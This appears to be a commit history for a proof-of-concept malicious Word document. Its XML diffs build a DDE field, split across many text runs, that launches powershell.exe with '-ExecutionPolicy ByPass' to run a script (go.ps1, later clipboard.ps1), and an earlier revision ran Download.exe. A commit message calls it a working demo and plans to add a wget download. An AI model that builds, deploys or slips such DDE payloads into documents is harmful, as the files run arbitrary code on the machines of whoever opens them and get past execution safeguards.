<commit_message>
I've got a practically completely working demo here. If I'm feeling ambitious, I might add a wget download to the word, then another file download for the powershell file. But, it works very well!
</commit_message>
<xml_diff>
--- a/ClipboardInjections/Testing DDE in word with powershell.docx
+++ b/ClipboardInjections/Testing DDE in word with powershell.docx
@@ -109,7 +109,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:instrText>ystem32\\WindowsPowerShell\\v1.0\</w:instrText>
+        <w:instrText>ystem32\\</w:instrText>
+      </w:r>
+      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:instrText>WindowsPowerShell</w:instrText>
+      </w:r>
+      <w:bookmarkEnd w:id="1"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:instrText>\\v1.0\</w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -160,8 +178,6 @@
         </w:rPr>
         <w:instrText>c</w:instrText>
       </w:r>
-      <w:bookmarkStart w:id="1" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="1"/>
       <w:r>
         <w:rPr>
           <w:color w:val="FF0000"/>
@@ -176,23 +192,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:instrText>./</w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:instrText>Down</w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:instrText>load.exe</w:instrText>
+        <w:instrText>powershell -ExecutionPolicy ByPass -File go.ps1</w:instrText>
       </w:r>
       <w:r>
         <w:fldChar w:fldCharType="separate"/>

</xml_diff>

<commit_message>
Fixed a bug on the clipboard
</commit_message>
<xml_diff>
--- a/ClipboardInjections/Testing DDE in word with powershell.docx
+++ b/ClipboardInjections/Testing DDE in word with powershell.docx
@@ -109,17 +109,82 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:instrText>ystem32\\</w:instrText>
+        <w:instrText>ystem32\\WindowsPowerShell\\v1.0\</w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:instrText>\</w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:instrText>powershell.exe</w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve">  </w:instrText>
+      </w:r>
+      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:instrText>"</w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:instrText>/</w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:instrText>c</w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve">powershell -ExecutionPolicy ByPass -File </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:instrText>clipboard</w:instrText>
       </w:r>
       <w:bookmarkStart w:id="1" w:name="_GoBack"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:instrText>WindowsPowerShell</w:instrText>
-      </w:r>
       <w:bookmarkEnd w:id="1"/>
       <w:r>
         <w:rPr>
@@ -127,72 +192,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:instrText>\\v1.0\</w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:instrText>\</w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:instrText>powershell.exe</w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:instrText xml:space="preserve">  </w:instrText>
-      </w:r>
-      <w:bookmarkEnd w:id="0"/>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:instrText>"</w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:instrText>/</w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:instrText>c</w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:instrText xml:space="preserve"> </w:instrText>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="FF0000"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:instrText>powershell -ExecutionPolicy ByPass -File go.ps1</w:instrText>
+        <w:instrText>.ps1</w:instrText>
       </w:r>
       <w:r>
         <w:fldChar w:fldCharType="separate"/>

</xml_diff>